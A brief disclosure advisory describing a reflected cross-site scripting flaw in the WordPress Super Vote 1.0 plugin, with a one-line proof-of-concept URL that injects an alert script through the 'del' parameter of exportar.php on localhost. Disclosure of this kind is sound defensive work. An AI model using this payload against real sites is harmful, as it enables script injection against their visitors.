Home
Consulting
Advisories
Software
Articles
Contact

WordPress Super Vote 1.0 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in WordPress Super Vote 1.0 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/wordpress/wp-content/plugins/wp-super-vote-post/exportar.php?del=%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC